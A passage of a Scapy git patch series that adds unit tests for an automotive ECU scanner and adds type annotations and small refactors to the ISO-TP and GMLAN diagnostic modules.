== False +assert config.delay_state_change > 0 + + += creation of config with instances and classes + +config = AutomotiveTestCaseExecutorConfiguration( + [MyTestCase2(), MyTestCase2(), MyTestCase3, MyTestCase4]) + +assert len(config.test_cases) == 4 +assert len(config.test_case_clss) == 3 +assert len(config.stages) == 0 +assert len(config.staged_test_cases) == 0 +assert config.verbose == False +assert config.debug == False +assert config.delay_state_change > 0 + + += creation of config with instances and classes and global configuration and local configuration + +config = AutomotiveTestCaseExecutorConfiguration( + [MyTestCase2(), MyTestCase2(), MyTestCase3, MyTestCase4], + global_config=42, verbose=True, MyTestCase2_kwargs={"local_config": 41}) + +assert len(config.test_cases) == 4 +assert len(config.test_case_clss) == 3 +assert len(config.stages) == 0 +assert len(config.staged_test_cases) == 0 +assert config.verbose == True +assert config.debug == False +assert config.delay_state_change > 0 +assert config["MyTestCase2"]["global_config"] == 42 +assert config["MyTestCase2"]["local_config"] == 41 +assert config["MyTestCase2"]["verbose"] == True +try: + print(config["MyTestCase1"]["global_config"]) + raise AssertionError +except KeyError: + pass + +assert len(config["MyTestCase3"]) == 2 +assert len(config["MyTestCase2"]) == 3 + +try: + print(config["MyTestCase3"]["local_config"]) + raise AssertionError +except KeyError: + pass + + += creation of config with stages + +st = StagedAutomotiveTestCase([MyTestCase1(), MyTestCase2()]) + +config = AutomotiveTestCaseExecutorConfiguration( + [MyTestCase2(), MyTestCase2, MyTestCase3, MyTestCase4, st]) + +assert len(config.test_cases) == 5 +assert len(config.test_case_clss) == 5 +assert len(config.stages) == 1 +assert len(config.staged_test_cases) == 2 +assert config.verbose == False +assert config.debug == False +assert config.delay_state_change > 0 + + + + + + + diff --git a/test/contrib/automotive/graph.uts b/test/contrib/automotive/scanner/graph.uts similarity index 96% rename from test/contrib/automotive/graph.uts rename to test/contrib/automotive/scanner/graph.uts index 5cdd8abcd03..8cd11dcd97d 100644 --- a/test/contrib/automotive/graph.uts +++ b/test/contrib/automotive/scanner/graph.uts @@ -4,7 +4,7 @@ = Load contribution layer -from scapy.contrib.automotive.graph import * +from scapy.contrib.automotive.scanner.graph import * import pickle import io diff --git a/test/contrib/automotive/scanner/staged_test_case.uts b/test/contrib/automotive/scanner/staged_test_case.uts new file mode 100644 index 00000000000..d52c2a2ac82 --- /dev/null +++ b/test/contrib/automotive/scanner/staged_test_case.uts @@ -0,0 +1,217 @@ +% Regression tests for automotive scanner staged test_case + ++ Load general modules + += Load contribution layer + +from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCase +from scapy.contrib.automotive.ecu import EcuState +from scapy.contrib.automotive.scanner.staged_test_case import StagedAutomotiveTestCase + ++ Basic checks + += Definition of Test classes + +class MyTestCase1(AutomotiveTestCase): + _description = "MyTestCase1" + def supported_responses(self): + return [] + +class MyTestCase2(AutomotiveTestCase): + _description = "MyTestCase2" + def supported_responses(self): + return [] + += Create instance of stage test + +tc1 = MyTestCase1() +tc2 = MyTestCase2() + +mt = StagedAutomotiveTestCase([tc1, tc2]) + +assert len(mt.test_cases) == 2 +assert mt.current_test_case == tc1 +assert mt.current_connector == None +assert mt.previous_test_case == None +assert mt[0] == tc1 +assert mt[1] == tc2 + += Check completion + +tc1 = MyTestCase1() +tc2 = MyTestCase2() + +mt = StagedAutomotiveTestCase([tc1, tc2]) + +tc1._state_completed[EcuState(session=1)] = False +tc2._state_completed[EcuState(session=1)] = False + +assert not mt.completed +assert not mt.has_completed(EcuState(session=1)) + +tc1._state_completed[EcuState(session=1)] = True +assert mt.current_test_case == tc1 +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert mt.current_test_case == tc2 +assert not mt.completed + +tc2._state_completed[EcuState(session=1)] = True +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert mt.completed +assert mt.has_completed(EcuState(session=1)) + += Check completion 2 + +tc1 = MyTestCase1() +tc2 = MyTestCase2() + +mt = StagedAutomotiveTestCase([tc1, tc2]) + +tc1._state_completed[EcuState(session=1)] = False +tc2._state_completed[EcuState(session=1)] = False + +assert not mt.completed +assert not mt.has_completed(EcuState(session=1)) + +tc1._state_completed[EcuState(session=1)] = True +assert mt.current_test_case == tc1 +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +tc1._state_completed[EcuState(session=1)] = False +assert not mt.has_completed(EcuState(session=1)) +tc1._state_completed[EcuState(session=1)] = True +assert mt.current_test_case == tc1 +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) + +assert mt.current_test_case == tc2 +assert not mt.completed + +tc2._state_completed[EcuState(session=1)] = True +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert mt.completed +assert mt.has_completed(EcuState(session=1)) + + += Check connector + +test_storage_tc2 = None + +class MyTestCase2(AutomotiveTestCase): + _description = "MyTestCase2" + def pre_execute(self, socket, state, global_configuration): + global test_storage_tc2 + print(global_configuration) + test_storage_tc2 = global_configuration + def supported_responses(self): + return [] + +test_storage_tc3 = None + +class MyTestCase3(AutomotiveTestCase): + _description = "MyTestCase3" + def pre_execute(self, socket, state, global_configuration): + global test_storage_tc3 + print(global_configuration) + test_storage_tc3 = global_configuration + def supported_responses(self): + return [] + +def con1(tc1, tc2): + assert isinstance(tc1, MyTestCase1) + assert isinstance(tc2, MyTestCase2) + return {"tc2_con_config": 42} + +def con2(tc2, tc3): + assert isinstance(tc2, MyTestCase2) + assert isinstance(tc3, MyTestCase3) + return {"tc3_con_config": "deadbeef"} + +tc1 = MyTestCase1() +tc2 = MyTestCase2() +tc3 = MyTestCase3() + +assert test_storage_tc2 is None +assert test_storage_tc3 is None + +mt = StagedAutomotiveTestCase([tc1, tc2, tc3], [None, con1, con2]) + +assert mt.current_test_case == tc1 +assert mt.current_connector == None + +#Move stage forward +tc1._state_completed[EcuState(session=1)] = True +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) + +assert mt.current_test_case == tc2 +assert mt.current_connector == con1 + +mt.pre_execute(None, None, {"MyTestCase2": {"verbose": True, "config": "whatever"}}) + +assert test_storage_tc2["MyTestCase2"]["verbose"] +assert test_storage_tc2["MyTestCase2"]["tc2_con_config"] == 42 +assert test_storage_tc2["MyTestCase2"]["config"] == "whatever" + +#Move stage forward +tc2._state_completed[EcuState(session=1)] = True +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) +assert not mt.has_completed(EcuState(session=1)) + +assert mt.current_test_case == tc3 +assert mt.current_connector == con2 + +mt.pre_execute(None, None, {}) + +assert test_storage_tc3["MyTestCase3"]["tc3_con_config"] == "deadbeef" + += Check show + +dump = mt.show(dump=True) + +assert "MyTestCase1" in dump +assert "MyTestCase2" in dump +assert "MyTestCase3" in dump + += Check len + +assert len(mt) == 3 + += Check generator functions + +assert mt.get_generated_test_case() == None +assert mt.get_new_edge(None, None) == None +assert mt.get_transition_function(None, None) == None + + + + + diff --git a/test/contrib/automotive/scanner/test_case.uts b/test/contrib/automotive/scanner/test_case.uts new file mode 100644 index 00000000000..8f3103ff09f --- /dev/null +++ b/test/contrib/automotive/scanner/test_case.uts @@ -0,0 +1,79 @@ +% Regression tests for automotive scanner test_case + ++ Load general modules + += Load contribution layer + +from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCase +from scapy.contrib.automotive.ecu import EcuState + ++ Basic checks + += Definition of Test class + +class MyTestCase(AutomotiveTestCase): + _description = "MyTestCase" + def supported_responses(self): + return [] + += Create instance of test class + +mt = MyTestCase() + +mt._state_completed[EcuState(session=1)] = True +mt._state_completed[EcuState(session=2)] = True +mt._state_completed[EcuState(session=3)] = False + += Tests of has_completed + +assert mt.completed is False +assert mt.has_completed(EcuState(session=1)) +assert mt.has_completed(EcuState(session=3)) is False + +assert len(mt.scanned_states) == 3 + += Tests of has_completed with new state + +assert mt.completed is False +assert mt.has_completed(EcuState(session=4)) is False +assert mt.has_completed(EcuState(session=3)) is False + +assert len(mt.scanned_states) == 4 + += Tests of completed + +mt._state_completed[EcuState(session=3)] = True +mt._state_completed[EcuState(session=4)] = True + +assert mt.completed + += Test of show + +header = mt._show_header(dump=True) + +assert "MyTestCase" in header + +state_info = mt._show_state_information(dump=True) + +assert "session" in state_info +assert "False" not in state_info +assert "True" in state_info + +mt._state_completed[EcuState(session=3)] = False +state_info = mt._show_state_information(dump=True) + +assert "session" in state_info +assert "False" in state_info +assert "True" in state_info + +dump = mt.show(dump=True, verbose=True) + +assert "session" in dump +assert "MyTestCase" in dump + + + + + + + From 12445543bac7dbe5301ea3842724809941bf3878 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 22 Apr 2021 11:10:34 +0200 Subject: [PATCH 0562/1632] Isotp typing (#3078) --- .config/mypy/mypy_enabled.txt | 1 + scapy/compat.py | 1 + scapy/contrib/automotive/gm/gmlanutils.py | 78 ++- scapy/contrib/automotive/kwp.py | 2 +- scapy/contrib/isotp.py | 765 +++++++++++++--------- scapy/fields.py | 6 +- scapy/sessions.py | 11 +- test/contrib/automotive/uds_utils.uts | 4 +- test/contrib/isotp.uts | 8 +- 9 files changed, 545 insertions(+), 331 deletions(-) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 3c6f7debe87..5c79289b8df 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -51,4 +51,5 @@ scapy/contrib/automotive/gm/gmlan_ecu_states.py scapy/contrib/automotive/gm/gmlan_logging.py scapy/contrib/automotive/bmw/hsfz.py scapy/contrib/automotive/doip.py +scapy/contrib/isotp.py scapy/contrib/automotive/kwp.py diff --git a/scapy/compat.py b/scapy/compat.py index 0939a410e4b..561cd6aa351 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -27,6 +27,7 @@ 'DefaultDict', 'Dict', 'Generic', + 'Iterable', 'IO', 'Iterable', 'Iterator', diff --git a/scapy/contrib/automotive/gm/gmlanutils.py b/scapy/contrib/automotive/gm/gmlanutils.py index d02fbec2aaf..b77cdd378ea 100644 --- a/scapy/contrib/automotive/gm/gmlanutils.py +++ b/scapy/contrib/automotive/gm/gmlanutils.py @@ -17,6 +17,7 @@ GMLAN_TD, GMLAN_PM, GMLAN_RMBA from scapy.config import conf from scapy.packet import Packet +from scapy.supersocket import SuperSocket from scapy.contrib.isotp import ISOTPSocket from scapy.error import warning, log_loading from scapy.utils import PeriodicSenderThread @@ -39,7 +40,7 @@ # Helper function def _check_response(resp, verbose): - # type: (Packet, Optional[bool]) -> bool + # type: (Optional[Packet], Optional[bool]) -> bool if resp is None: if verbose: print("Timeout.") @@ -52,7 +53,7 @@ def _check_response(resp, verbose): class GMLAN_TesterPresentSender(PeriodicSenderThread): def __init__(self, sock, pkt=GMLAN(service="TesterPresent"), interval=2): - # type: (ISOTPSocket, Packet, int) -> None + # type: (SuperSocket, Packet, int) -> None """ Thread to send GMLAN TesterPresent packets periodically :param sock: socket where packet is sent periodically @@ -69,8 +70,14 @@ def run(self): time.sleep(self._interval) -def GMLAN_InitDiagnostics(sock, broadcast_socket=None, timeout=None, verbose=None, retry=0): # noqa: E501 - # type: (ISOTPSocket, Optional[ISOTPSocket], Optional[int], Optional[bool], int) -> bool # noqa: E501 +def GMLAN_InitDiagnostics( + sock, # type: SuperSocket + broadcast_socket=None, # type: Optional[SuperSocket] + timeout=None, # type: Optional[int] + verbose=None, # type: Optional[bool] + retry=0 # type: int +): + # type: (...) -> bool """ Send messages to put an ECU into diagnostic/programming state. :param sock: socket for communication. @@ -84,7 +91,7 @@ def GMLAN_InitDiagnostics(sock, broadcast_socket=None, timeout=None, verbose=Non """ # Helper function def _send_and_check_response(sock, req, timeout, verbose): - # type: (ISOTPSocket, Packet, Optional[int], Optional[bool]) -> bool + # type: (SuperSocket, Packet, Optional[int], Optional[bool]) -> bool if verbose: print("Sending %s" % repr(req)) resp = sock.sr1(req, timeout=timeout, verbose=False) @@ -129,8 +136,15 @@ def _send_and_check_response(sock, req, timeout, verbose): return False -def GMLAN_GetSecurityAccess(sock, key_function, level=1, timeout=None, verbose=None, retry=0): # noqa: E501 - # type: (ISOTPSocket, Callable[[int], int], int, Optional[int], Optional[bool], int) -> bool # noqa: E501 +def GMLAN_GetSecurityAccess( + sock, # type: SuperSocket + key_function, # type: Callable[[int], int] + level=1, # type: int + timeout=None, # type: Optional[int] + verbose=None, # type: Optional[bool] + retry=0 # type: int +): + # type: (...) -> bool """ Authenticate on ECU. Implements Seey-Key procedure. :param sock: socket to send the message on. @@ -168,7 +182,7 @@ def GMLAN_GetSecurityAccess(sock, key_function, level=1, timeout=None, verbose=N print("Negative Response.") continue - seed = resp.securitySeed + seed = cast(Packet, resp).securitySeed if seed == 0: if verbose: print("ECU security already unlocked. (seed is 0x0000)") @@ -185,13 +199,12 @@ def GMLAN_GetSecurityAccess(sock, key_function, level=1, timeout=None, verbose=N continue if verbose: resp.show() - if resp.sprintf("%GMLAN.service%") == "SecurityAccessPositiveResponse": # noqa: E501 + if resp.service == 0x67: if verbose: print("SecurityAccess granted.") return True # Invalid Key - elif resp.sprintf("%GMLAN.service%") == "NegativeResponse" and \ - resp.sprintf("%GMLAN.returnCode%") == "InvalidKey": + elif resp.service == 0x7f and resp.returnCode == 0x35: if verbose: print("Key invalid") continue @@ -200,7 +213,7 @@ def GMLAN_GetSecurityAccess(sock, key_function, level=1, timeout=None, verbose=N def GMLAN_RequestDownload(sock, length, timeout=None, verbose=None, retry=0): - # type: (ISOTPSocket, int, Optional[int], Optional[bool], int) -> bool + # type: (SuperSocket, int, Optional[int], Optional[bool], int) -> bool """ Send RequestDownload message. Usually used before calling TransferData. @@ -228,8 +241,16 @@ def GMLAN_RequestDownload(sock, length, timeout=None, verbose=None, retry=0): return False -def GMLAN_TransferData(sock, addr, payload, maxmsglen=None, timeout=None, verbose=None, retry=0): # noqa: E501 - # type: (ISOTPSocket, int, bytes, Optional[int], Optional[int], Optional[bool], int) -> bool # noqa: E501 +def GMLAN_TransferData( + sock, # type: SuperSocket + addr, # type: int + payload, # type: bytes + maxmsglen=None, # type: Optional[int] + timeout=None, # type: Optional[int] + verbose=None, # type: Optional[bool] + retry=0 # type: int +): + # type: (...) -> bool """ Send TransferData message. Usually used after calling RequestDownload. @@ -284,9 +305,16 @@ def GMLAN_TransferData(sock, addr, payload, maxmsglen=None, timeout=None, verbos return True -def GMLAN_TransferPayload(sock, addr, payload, maxmsglen=None, timeout=None, - verbose=None, retry=0): - # type: (ISOTPSocket, int, bytes, Optional[int], Optional[int], Optional[bool], int) -> bool # noqa: E501 +def GMLAN_TransferPayload( + sock, # type: SuperSocket + addr, # type: int + payload, # type: bytes + maxmsglen=None, # type: Optional[int] + timeout=None, # type: Optional[int] + verbose=None, # type: Optional[bool] + retry=0 # type: int +): + # type: (...) -> bool """ Send data by using GMLAN services. :param sock: socket to send the data on. @@ -308,9 +336,15 @@ def GMLAN_TransferPayload(sock, addr, payload, maxmsglen=None, timeout=None, return True -def GMLAN_ReadMemoryByAddress(sock, addr, length, timeout=None, - verbose=None, retry=0): - # type: (ISOTPSocket, int, int, Optional[int], Optional[bool], int) -> Optional[bytes] # noqa: E501 +def GMLAN_ReadMemoryByAddress( + sock, # type: SuperSocket + addr, # type: int + length, # type: int + timeout=None, # type: Optional[int] + verbose=None, # type: Optional[bool] + retry=0 # type: int +): + # type: (...) -> Optional[bytes] """ Read data from ECU memory. :param sock: socket to send the data on. @@ -343,7 +377,7 @@ def GMLAN_ReadMemoryByAddress(sock, addr, length, timeout=None, pkt = GMLAN() / GMLAN_RMBA(memoryAddress=addr, memorySize=length) resp = sock.sr1(pkt, timeout=timeout, verbose=0) if _check_response(resp, verbose): - return resp.dataRecord + return cast(Packet, resp).dataRecord retry -= 1 if retry >= 0 and verbose: print("Retrying..") @@ -351,7 +385,7 @@ def GMLAN_ReadMemoryByAddress(sock, addr, length, timeout=None, def GMLAN_BroadcastSocket(interface): - # type: (str) -> ISOTPSocket + # type: (str) -> SuperSocket """ Returns a GMLAN broadcast socket using interface. :param interface: interface name diff --git a/scapy/contrib/automotive/kwp.py b/scapy/contrib/automotive/kwp.py index 55730629fdd..dd284543c82 100644 --- a/scapy/contrib/automotive/kwp.py +++ b/scapy/contrib/automotive/kwp.py @@ -92,7 +92,7 @@ class KWP(ISOTP): 0x7f: 'NegativeResponse'}) # type: Dict[int, str] name = 'KWP' fields_desc = [ - XByteEnumField('service', 0, services) + XByteEnumField('service', 0, services) # type: ignore ] def answers(self, other): diff --git a/scapy/contrib/isotp.py b/scapy/contrib/isotp.py index 845d566d9a0..9ef36047110 100644 --- a/scapy/contrib/isotp.py +++ b/scapy/contrib/isotp.py @@ -12,7 +12,6 @@ ISOTPSocket. """ - import ctypes from ctypes.util import find_library import struct @@ -21,8 +20,10 @@ import traceback import heapq from threading import Thread, Event, Lock -from scapy.compat import Iterator, Optional, Union, List, Tuple, Dict +from scapy.compat import Iterable, Optional, Union, List, Tuple, Dict, Any, \ + Type, cast, Callable, TYPE_CHECKING +from scapy.utils import EDecimal from scapy.packet import Packet from scapy.fields import BitField, FlagsField, StrLenField, \ ThreeBytesField, XBitField, ConditionalField, \ @@ -33,13 +34,17 @@ import scapy.automaton as automaton from scapy.modules.six.moves import queue from scapy.error import Scapy_Exception, warning, log_loading, log_runtime -from scapy.supersocket import SuperSocket, SO_TIMESTAMPNS +from scapy.supersocket import SuperSocket +from scapy.data import SO_TIMESTAMPNS from scapy.config import conf from scapy.consts import LINUX from scapy.contrib.cansocket import PYTHON_CAN from scapy.sendrecv import sniff from scapy.sessions import DefaultSession +if TYPE_CHECKING: + from scapy.contrib.cansocket import CANSocket + __all__ = ["ISOTP", "ISOTPHeader", "ISOTPHeaderEA", "ISOTP_SF", "ISOTP_FF", "ISOTP_CF", "ISOTP_FC", "ISOTPSoftSocket", "ISOTPSession", "ISOTPSocket", "ISOTPSocketImplementation", "ISOTPMessageBuilder", @@ -47,7 +52,7 @@ USE_CAN_ISOTP_KERNEL_MODULE = False if six.PY3 and LINUX: - LIBC = ctypes.cdll.LoadLibrary(find_library("c")) + LIBC = ctypes.cdll.LoadLibrary(find_library("c")) # type: ignore try: if conf.contribs['ISOTP']['use-can-isotp-kernel-module']: USE_CAN_ISOTP_KERNEL_MODULE = True @@ -66,33 +71,36 @@ class ISOTP(Packet): + """Packet class for ISOTP messages. This class contains additional + slots for source address (src), destination address (dst), + extended source address (exsrc) and + extended destination address (exdst) information. This information + gets filled from ISOTPSockets or the ISOTPMessageBuilder, if it + is available. Address information is not used for Packet comparison. + + :param args: Arguments for Packet init, for example bytes string + :param kwargs: Keyword arguments for Packet init. + """ name = 'ISOTP' fields_desc = [ - StrField('data', B"") + StrField('data', b"") ] __slots__ = Packet.__slots__ + ["src", "dst", "exsrc", "exdst"] def __init__(self, *args, **kwargs): - self.src = None - self.dst = None - self.exsrc = None - self.exdst = None - if "src" in kwargs: - self.src = kwargs["src"] - del kwargs["src"] - if "dst" in kwargs: - self.dst = kwargs["dst"] - del kwargs["dst"] - if "exsrc" in kwargs: - self.exsrc = kwargs["exsrc"] - del kwargs["exsrc"] - if "exdst" in kwargs: - self.exdst = kwargs["exdst"] - del kwargs["exdst"] + # type: (Any, Any) -> None + self.src = kwargs.pop("src", None) # type: Optional[int] + self.dst = kwargs.pop("dst", None) # type: Optional[int] + self.exsrc = kwargs.pop("exsrc", None) # type: Optional[int] + self.exdst = kwargs.pop("exdst", None) # type: Optional[int] Packet.__init__(self, *args, **kwargs) self.validate_fields() def validate_fields(self): + # type: () -> None + """Helper function to validate information in src, dst, exsrc and exdst + slots + """ if self.src is not None: if not 0 <= self.src <= CAN_MAX_IDENTIFIER: raise Scapy_Exception("src is not a valid CAN identifier") @@ -106,7 +114,13 @@ def validate_fields(self): if not 0 <= self.exdst <= 0xff: raise Scapy_Exception("exdst is not a byte") - def fragment(self): + def fragment(self, *args, **kargs): + # type: (*Any, **Any) -> List[Packet] + """Helper function to fragment an ISOTP message into multiple + CAN frames. + + :return: A list of CAN frames + """ data_bytes_in_frame = 7 if self.exdst is not None: data_bytes_in_frame = 6 @@ -164,32 +178,39 @@ def fragment(self): @staticmethod def defragment(can_frames, use_extended_addressing=None): + # type: (List[Packet], Optional[bool]) -> Optional[ISOTP] + """Helper function to defragment a list of CAN frames to one ISOTP + message + + :param can_frames: A list of CAN frames + :param use_extended_addressing: Specify if extended ISO-TP addressing + is used in the packets for + defragmentation. + :return: An ISOTP message containing the data of the CAN frames or None + """ if len(can_frames) == 0: raise Scapy_Exception("ISOTP.defragment called with 0 frames") dst = can_frames[0].identifier - for frame in can_frames: - if frame.identifier != dst: - warning("Not all CAN frames have the same identifier") + if any(frame.identifier != dst for frame in can_frames): + warning("Not all CAN frames have the same identifier") parser = ISOTPMessageBuilder(use_extended_addressing) - for c in can_frames: - parser.feed(c) + parser.feed(can_frames) results = [] - while parser.count > 0: - p = parser.pop() + for p in parser: if (use_extended_addressing is True and p.exdst is not None) \ or (use_extended_addressing is False and p.exdst is None) \ or (use_extended_addressing is None): results.append(p) - if len(results) == 0: + if not results: return None - if len(results) > 0: + if len(results) > 1: warning("More than one ISOTP frame could be defragmented from the " - "provided CAN frames, returning the first one.") + "provided CAN frames, only returning the first one.") return results[0] @@ -202,13 +223,15 @@ class ISOTPHeader(CAN): 'extended']), XBitField('identifier', 0, 29), ByteField('length', None), - ThreeBytesField('reserved', 0), + ThreeBytesField('reserved', 0) ] def extract_padding(self, p): + # type: (bytes) -> Tuple[bytes, Optional[bytes]] return p, None def post_build(self, pkt, pay): + # type: (bytes, bytes) -> bytes """ This will set the ByteField 'length' to the correct value. """ @@ -217,8 +240,12 @@ def post_build(self, pkt, pay): return pkt + pay def guess_payload_class(self, payload): - """ - ISOTP encodes the frame type in the first nibble of a frame. + # type: (bytes) -> Type[Packet] + """ISO-TP encodes the frame type in the first nibble of a frame. This + is used to determine the payload_class + + :param payload: payload bytes string + :return: Type of payload class """ t = (orb(payload[0]) & 0xf0) >> 4 if t == 0: @@ -233,11 +260,18 @@ def guess_payload_class(self, payload): class ISOTPHeaderEA(ISOTPHeader): name = 'ISOTPHeaderExtendedAddress' - fields_desc = ISOTPHeader.fields_desc + [ - XByteField('extended_address', 0), + fields_desc = [ + FlagsField('flags', 0, 3, ['error', + 'remote_transmission_request', + 'extended']), + XBitField('identifier', 0, 29), + ByteField('length', None), + ThreeBytesField('reserved', 0), + XByteField('extended_address', 0) ] def post_build(self, p, pay): + # type: (bytes, bytes) -> bytes """ This will set the ByteField 'length' to the correct value. 'chb(len(pay) + 1)' is required, because the field 'extended_address' @@ -259,7 +293,7 @@ class ISOTP_SF(Packet): fields_desc = [ BitEnumField('type', 0, 4, ISOTP_TYPE), BitFieldLenField('message_size', None, 4, length_of='data'), - StrLenField('data', '', length_from=lambda pkt: pkt.message_size) + StrLenField('data', b'', length_from=lambda pkt: pkt.message_size) ] @@ -270,7 +304,7 @@ class ISOTP_FF(Packet): BitField('message_size', 0, 12), ConditionalField(BitField('extended_message_size', 0, 32), lambda pkt: pkt.message_size == 0), - StrField('data', '', fmt="B") + StrField('data', b'', fmt="B") ] @@ -279,7 +313,7 @@ class ISOTP_CF(Packet): fields_desc = [ BitEnumField('type', 2, 4, ISOTP_TYPE), BitField('index', 0, 4), - StrField('data', '', fmt="B") + StrField('data', b'', fmt="B") ] @@ -296,17 +330,27 @@ class ISOTP_FC(Packet): class ISOTPMessageBuilderIter(object): + """ + Iterator class for ISOTPMessageBuilder + """ slots = ["builder"] def __init__(self, builder): + # type: (ISOTPMessageBuilder) -> None self.builder = builder def __iter__(self): + # type: () -> ISOTPMessageBuilderIter return self def __next__(self): + # type: () -> ISOTP while self.builder.count: - return self.builder.pop() + p = self.builder.pop() + if p is None: + break + else: + return p raise StopIteration next = __next__ @@ -314,6 +358,8 @@ def __next__(self): class ISOTPMessageBuilder(object): """ + Initialize a ISOTPMessageBuilder object + Utility class to build ISOTP messages out of CAN frames, used by both ISOTP.defragment() and ISOTPSession. @@ -324,20 +370,34 @@ class ISOTPMessageBuilder(object): CAN frames are fed to an ISOTPMessageBuilder object with the feed() method and the resulting ISOTP frames can be extracted using the pop() method. + + :param use_ext_addr: True for only attempting to defragment with + extended addressing, False for only attempting + to defragment without extended addressing, + or None for both + :param did: Destination Identifier + :param basecls: The class of packets that will be returned, + defaults to ISOTP """ class Bucket(object): - def __init__(self, total_len, first_piece, ts=None): - self.pieces = list() + """ + Helper class to store not finished ISOTP messages while building. + """ + + def __init__(self, total_len, first_piece, ts): + # type: (int, bytes, Union[EDecimal, float]) -> None + self.pieces = list() # type: List[bytes] self.total_len = total_len self.current_len = 0 - self.ready = None - self.src = None - self.exsrc = None - self.time = ts + self.ready = None # type: Optional[bytes] + self.src = None # type: Optional[int] + self.exsrc = None # type: Optional[int] + self.time = ts # type: Union[float, EDecimal] self.push(first_piece) def push(self, piece): + # type: (bytes) -> None self.pieces.append(piece) self.current_len += len(piece) if self.current_len >= self.total_len: @@ -347,62 +407,69 @@ def push(self, piece): isotp_data = "".join(map(str, self.pieces)) self.ready = isotp_data[:self.total_len] - def __init__(self, use_ext_addr=None, did=None, basecls=None): - """ - Initialize a ISOTPMessageBuilder object - - :param use_ext_addr: True for only attempting to defragment with - extended addressing, False for only attempting - to defragment without extended addressing, - or None for both - :param basecls: the class of packets that will be returned, - defaults to ISOTP - - """ - self.ready = [] - self.buckets = {} + def __init__( + self, + use_ext_addr=None, # type: Optional[bool] + did=None, # type: Optional[Union[int, List[int], Iterable[int]]] + basecls=ISOTP # type: Type[Packet] + ): + # type: (...) -> None + self.ready = [] # type: List[Tuple[int, Optional[int], ISOTPMessageBuilder.Bucket]] # noqa: E501 + self.buckets = {} # type: Dict[Tuple[Optional[int], int, int], ISOTPMessageBuilder.Bucket] # noqa: E501 self.use_ext_addr = use_ext_addr - self.basecls = basecls or ISOTP - self.dst_ids = None - self.last_ff = None - self.last_ff_ex = None + self.basecls = basecls + self.dst_ids = None # type: Optional[Iterable[int]] + self.last_ff = None # type: Optional[Tuple[Optional[int], int, int]] + self.last_ff_ex = None # type: Optional[Tuple[Optional[int], int, int]] # noqa: E501 if did is not None: - if hasattr(did, "__iter__"): + if isinstance(did, list): self.dst_ids = did - else: + elif isinstance(did, int): self.dst_ids = [did] + elif hasattr(did, "__iter__"): + self.dst_ids = did + else: + raise TypeError("Invalid type for argument did!") def feed(self, can): + # type: (Union[Iterable[Packet], Packet]) -> None """Attempt to feed an incoming CAN frame into the state machine""" if not isinstance(can, Packet) and hasattr(can, "__iter__"): for p in can: self.feed(p) return - identifier = can.identifier - if self.dst_ids is not None and identifier not in self.dst_ids: + if not isinstance(can, Packet): + return + + if self.dst_ids is not None and can.identifier not in self.dst_ids: return data = bytes(can.data) if len(data) > 1 and self.use_ext_addr is not True: - self._try_feed(identifier, None, data, can.time) + self._try_feed(can.identifier, None, data, can.time) if len(data) > 2 and self.use_ext_addr is not False: ea = six.indexbytes(data, 0) - self._try_feed(identifier, ea, data[1:], can.time) + self._try_feed(can.identifier, ea, data[1:], can.time) @property def count(self): + # type: () -> int """Returns the number of ready ISOTP messages built from the provided - can frames""" + can frames + + :return: Number of ready ISOTP messages + """ return len(self.ready) def __len__(self): + # type: () -> int return self.count def pop(self, identifier=None, ext_addr=None): - """ - Returns a built ISOTP message + # type: (Optional[int], Optional[int]) -> Optional[Packet] + """Returns a built ISOTP message :param identifier: if not None, only return isotp messages with this destination @@ -426,12 +493,18 @@ def pop(self, identifier=None, ext_addr=None): return None def __iter__(self): + # type: () -> ISOTPMessageBuilderIter return ISOTPMessageBuilderIter(self) @staticmethod - def _build(t, basecls=ISOTP): + def _build( + t, # type: Tuple[int, Optional[int], ISOTPMessageBuilder.Bucket] + basecls=ISOTP # type: Type[Packet] + ): + # type: (...) -> Packet bucket = t[2] - p = basecls(bucket.ready) + data = bucket.ready or b"" + p = basecls(data) if hasattr(p, "dst"): p.dst = t[0] if hasattr(p, "exdst"): @@ -445,6 +518,7 @@ def _build(t, basecls=ISOTP): return p def _feed_first_frame(self, identifier, ea, data, ts): + # type: (int, Optional[int], bytes, Union[EDecimal, float]) -> bool if len(data) < 3: # At least 3 bytes are necessary: 2 for length and 1 for data return False @@ -465,6 +539,7 @@ def _feed_first_frame(self, identifier, ea, data, ts): return True def _feed_single_frame(self, identifier, ea, data, ts): + # type: (int, Optional[int], bytes, Union[EDecimal, float]) -> bool if len(data) < 2: # At least 2 bytes are necessary: 1 for length and 1 for data return False @@ -481,6 +556,7 @@ def _feed_single_frame(self, identifier, ea, data, ts): return True def _feed_consecutive_frame(self, 